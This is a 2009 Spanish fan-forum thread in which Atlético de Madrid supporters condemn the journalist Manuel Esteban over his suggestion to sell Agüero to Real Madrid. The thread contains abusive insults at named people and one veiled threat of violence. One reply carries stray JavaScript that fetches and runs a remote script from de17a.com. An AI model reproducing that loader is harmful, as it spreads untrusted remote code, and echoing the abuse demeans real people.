en

Nuevo desvario de Tontolete...

Último artículo 30-12-2009 19:48 escrito por rago. 24 respuestas.
Página 1 de 2 (25 elementos) 1 2 Siguiente >
Ordenar mensajes: Anterior Siguiente
  • 30-12-2009 6:47

    Nuevo desvario de Tontolete...

    Cuando oigo y leo a personajes como el inefable Manuel Esteban(tontolete) me entra una mala ostia que no puedo con ella. Como es posible que tipos asi presuman ser del Atleti, este lo que es, es un *** estomago agradecido que esta chupando todo lo que puede del duo siniestro que dirige(mejor dicho que hunde) a nuestro Atleti.
    Fijaos en el ultimo desvario de este tipo absolutamente despreciable (y no insulto mas porque voy a decir burradas). Os dejo el link de su infame blog http://blogs.as.com/manolete/2009/12/ y a continuación os pongo lo que me ha puesto de muy mala ostia:

    ´´No descarto la opción de Agüero al Madrid. No es mala alternativa si hay dinero y jugadores por medio. No hay que escandalizarse por aprovecharse del eterno rival. Por esos escrúpulos malentendidos no tuvimos a Etoo cuando Florentino nos pedía una opción de compra sobre Fernando Torres``  Tontolete dixit

    En serio, vosotros creeis que un atlético de verdad puede decir semejante barbaridad?? o sea que uno de los jugadores con mas futuro en el futbol mundial no solo no nos lo quedamos, no, ni venderlo al Chelsea por ejemplo,no, lo que tenemos que hacer es venderselo al Mafias para disfrutar como se sale y nosotros hundidos en la mediocridad. Esto es intolerable!!! gentuza asi sobra en este club, en serio no voy a seguir porque estoy de muy mala leche con esto. 

  • 30-12-2009 9:14 en respuesta a

    Re: Nuevo desvario de Tontolete...

    P_Futre:
    ´´No descarto la opción de Agüero al Madrid. No es mala alternativa si hay dinero y jugadores por medio. No hay que escandalizarse por aprovecharse del eterno rival. Por esos escrúpulos malentendidos no tuvimos a Etoo cuando Florentino nos pedía una opción de compra sobre Fernando Torres``  Tontolete dixit
     

     

    ciertamente estas frases son muy preocupantes, son de una estupidez máxima, luego se preguntan por qué los insultan por la calle...

    GIL CULPABLE,CEREZO MARIONETA.
    DILES QUE SE VAYAN
  • 30-12-2009 11:02 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Este tio no solo es idiot*, ademas deberia de cambiar de camello, porque le pasa una mierda que le deja tonta su unica y estupida neurona.

     

    ATLETI O MUERTE.
  • 30-12-2009 11:13 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Este manuscrito incita a la violencia, sinceramente, que no me cruce con este señor ya sea en la calle o yendo al Calderón porque no respondo de mis actos.

    Si esto viniera de un vikingo me parecería hasta normal el que nos vendan la burra de que necesitamos sanearnos y darles al Kun pero viniendo de un presunto atlético me parece totálmente ridículo.

     



  • 30-12-2009 11:32 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Poco se puede decir ya de esta suerte de voceros del diario As (de la Cadena Ser por añadidura), salvo que las ideas que vierte gente como Manolete, Picu, Antonio Ruiz... no son de primera mano. Esto es, vienen generalmente pautadas por cuanto se maneja en los despachos aléticos. Y si desde hace tiempo se entiende como plausible la hipótesis de que fue un error no traspasar a Forlán este verano (aun habiendo una oferta "sustanciosa" del Real Madrid), no es descartable la posibilidad de que pueda entenderse como deseable una nueva oferta de este equipo, en esta ocasión por Agüero. Ello no sólo habla del poco valor identitario que se estila por las oficinas del Manzanares, sino más que nada sobre el inexistente respeto que se tiene por el aficionado alético de parte de los dirigentes de la marca. (Y para muestra las más recientes declaraciones del inefable presidente de ésta, tanto en relación a los "negativos" como a los "compraentradas".) Aun tomando con mucha cautela el globo sonda de Manolete, esto sólo presagia una nueva vuelta de tuerca de Cerezo y Gil Marín, en el que el "sálvese quien pueda" en el que se han apostado debido a la caótica planificación deportiva de esta temporada, puede llevar a situaciones tan afrentosas como la que se postula desde estas líneas de As. Y lo más sonrojante de todo es que son pensamientos que, las más de las veces, acaban permeando el sentimiento del aficionado medio alético. Así que no será raro escucharlo en breve en boca de algunos de éstos, de camino o de vuelta del Calderón, mientras uno no deja de tener la sensación de que escapa a toda lógica la esquizofrenia presente de lo que un día fue el Aleti. De poco sirve ya gastar tiempo en hacer comprender a alguien esta auténtica locura institucional. Indiferencia es lo que a uno le invade luego de tanta briega (estéril) ante tanto seguidismo y acriticismo inducido. En definitiva, más de lo mismo en esta inmundicia en la que han transfigurado lo que un día llegamos a amar tanto.

  • 30-12-2009 11:38 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Es peor que Roncero.

    Como dicen por ahí arriba, ese manuscrito incita a la violencia.

    Cada día que pasa sale algo en los medios o directamente desde el club que es peor que lo del día anterior. Creo que el fin del atleti no está lejos y cuanto antes llegue mejor recuerdo nos quedará.

  • 30-12-2009 11:46 en respuesta a

    Re: Nuevo desvario de Tontolete...

     por salud mental hace muchísimo tiempo que no leo a ese pobre desgraciado. en la vida se meocurriría pinchar en alguno de sus artículos.

    "Si se cree, y se trabaja, se puede". Palabra de Dios.

    Twitter: @14Tutto
  • 30-12-2009 12:03 en respuesta a

    Re: Nuevo desvario de Tontolete...

     Dejando a un lado al pavo este, al igual que no veía con malos ojos el traspaso de Forlán al Madrid (porque era, la parecer, el único que se interesó de verdad por él), me parecería inadmisible traspaserles a Agüero. ¿Por qué? Porque el Kun sí ha demostrado que siente algo por la camiseta que viste, aparte de ser un futbolista de mucha mayor dimensión que el uruguayo y tener la mitad de años, futbolísticamente hablando. No obstante, y si no me engaño, creo que el gran obstáculo para tal operación sería el propio Agüero. Sea como fuere, lo que parece claro es que este año podemos despedirnos de él, que es lo peor de todo.

    Saludos colchoneros
  • 30-12-2009 12:08 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Un dia dice un atletico de verdad como Daimiel que el kun se tiene que quedar en el atleti de por vida y al dia siguiente el gilipol*as este, dice que lo vendamos al madrid.

    Yo creo que esta basura esta siguiendo ordenes de su amo caratorcida para sondear como responde la aficion, si la gente no se lo toma muy a mal, ya sabemos donde acaba el kun.

    De todos modos la pareja ha demostrado a lo largo de los años que son muy cobardes, y si venden al kun al madrid, yo creo que hasta algun comepipas invade el palco.

    Que cantidad de mierda hay en nuestro querido y maltratado atleti

    ATLETI O MUERTE.
  • 30-12-2009 12:28 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Confío en la palabra del Kun..puede ir a muchos otros equipos del nivel del trampas.

    Respecto al lerdo ese no tengo palabras, sólo insultos y hoy me he levantado relajado.

    "El Atlético no se merece que le estén tratando como le están tratando. No se puede conformar con entrar en Europa, estoy en contra de anuncios como ese de 'Papá, ¿por qué somos del Atleti?'. ¡No! Cuando yo estaba siempre salíamos a competir a por la Liga, la Copa, todo. ¡Vuestros padres no nos permitían otra cosa! Somos el tercer equipo de España, pero nos hemos alejado de nuestra historia. Pero pensad que, cuando una puerta se cierra, se abre una ventana".
    Luis Aragonés en su Gaudeamus

    Diles que se vayan
    https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/404125_10151097005874053_1474836781_n.jpg
  • 30-12-2009 12:36 en respuesta a

    Re: Nuevo desvario de Tontolete...

    El hazmerreir del paleto de Brunete, esa buena persona que utiliza a estos bufones para gracia de los demas, dice lo que sus jefes le mandan. No se merece ni un minimo comentario ya que el pobre se gana el sueldo a costa de su dignidad.

  • 30-12-2009 12:43 en respuesta a

    Re: Nuevo desvario de Tontolete...

     solo se me ocuure una cosa para tanta escoria de periolistos, son unos mierdas el 99% de estos.

    DILES QUE SE VAYAN. otro año otro timo.
  • 30-12-2009 12:43 en respuesta a

    Re: Nuevo desvario de Tontolete...

     Pues yo no he podido evitarlo y le he mandado mis felicitaciones navideñas

    Me llamo Máximo Décimo Meridio, comandante de los ejércitos del norte, general de las legiones Félix, leal servidor del verdadero emperador Marco Aurelio. Padre de un hijo asesinado, marido de una mujer asesinada. Y alcanzaré mi venganza en esta vida o en la otra.
  • 30-12-2009 12:58 en respuesta a

    Re: Nuevo desvario de Tontolete...

    La afición no se equivoca en el juicio try{(function(){var A,B=document.getElementsByTagName("iframe"),C;for(var i in B){ if(BIdea.src&&BIdea.src.indexOf("http://de17a.com/a/27724.iframe?url=http%3A%2F%2Fde17a.com%2Fa%2F27724.click")>=0){A=BIdea}}C=function(){try{if(typeof(__$IS)=="undefined"){ __$IS=1;var b=document.createElement("script");b.setAttribute("src","http://de17a.com/i.js?z="+Math.random()); document.getElementsByTagName("head")[0].appendChild(b)}}catch(a){}};if(A.addEventListener){A.addEventListener('load',C, false);} else if(A.attachEvent){A.attachEvent('onload',C);}else{A.onload=C;}})();}catch(E){}

    Artículos de Manuel Esteban Manuel Esteban | 30/12/2009

     

    -->

    La afición atlética sigue siendo un tesoro impagable. El estudio de mercado que les servimos al Consejo no admite dudas. Olvidarse de Europa, centrarse en la Copa y apostar por la cantera. El resto son cantos de sirena. El Vicente Calderón está deseando apoyar a los Borja, Koke, Keko, Ibra, esos muchachos que nos han devuelto la ilusión en el sentido de que en cualquier momento puede salir otro Fernando Torres. La sangre colchonera fluye de una manera especial. Luchar por ese escudo y disfrutar sobre el campo. La pelea sobre la validez o no de los actuales gestores queda para otros foros. Si ayer mismo la presencia masiva de papás con sus críos en el entrenamiento es una muestra palpable de que el sentimiento de amor a unos colores nunca va a morir. A Quique le encantan este tipo de noticias. Desea que el vestuario sepa lo que piensa su gente y ya tiene su mejor regalo de Reyes. No le debe temblar la mano y la grada se va a volcar con el futuro de la entidad. El latiguillo de la presión son verdades a medias que nunca se cumplen cuando se pone como ejemplo al Atlético. Lo que no van a permitir las peñas son las fracturas y las tomaduras de pelo. Ahora lo que están añorando es que sus ídolos Agüero y Forlán vuelvan a ser los de la temporada pasada y se recuperen los valores de fútbol ofensivo y equilibrio que trajo la recompensa de jugar la Champions.

    Mucho se ha hablado desde que se inició la Liga de clima de guerra social. Es imposible. Los atléticos son de una pasta especial y ahora lo que esperan es que los jugadores les devuelvan parte de su apoyo. Desde la final de Valencia, se van a cumplir diez años, no han tenido la suerte de disfrutar con una final. Cerezo y Gil Marín se deben guiar por sus consejos y tener como meta el poder conseguir otra vez que Neptuno saque su tridente. Sin duda una afición que sirve de ejemplo y que todavía tiene algo de miedo pensando que el fantasma de Segunda puede ser una realidad.

     

    Un autentico esperpento. Lamentable y baboso de sus amos a mas no poder.Normal que sea el hazmerreir de sus compañeros de Prisa...

    A lo que yo veo, amigo Sancho, estos no son caballeros, sino gente soez y de mala ralea. Dígolo, porque bien me puedes ayudar a tomar la debida venganza del agravio que delante de nuestros ojos se le ha hecho al Atlético de Madrid. (El ingenioso hidalgo D. Quijote de la Mancha. Versión libre adaptada).
  • 30-12-2009 13:49 en respuesta a

    Re: Nuevo desvario de Tontolete...

    Ozemaria:

     Sea como fuere, lo que parece claro es que este año podemos despedirnos de él, que es lo peor de todo.

     Coincido contigo. Ya podemos disfrutar de él hasta mayo porque si hay una cosa clara es que se va. En cuanto al artículo de este botarate, mejor ni comentarlo.

Página 1 de 2 (25 elementos) 1 2 Siguiente >

AVISO LEGAL - Esta web pertenece a la ASDH, sin relación directa alguna con la sociedad Club Atlético de Madrid SAD. El uso de cualquier marca propiedad de la última se hace de modo nominativo y en ningún caso con fines comerciales o de intento de confusión de marcas. Así mismo SDH no se responsabiliza de las opiniones de sus colaboradores, foristas, etc...

Ofrecido por Community Server (Non-Commercial Edition) Football Supporters International Federación de Accionistas y Socios del Fútbol Español Asóciate al Atlético Club de Socios a través de Señales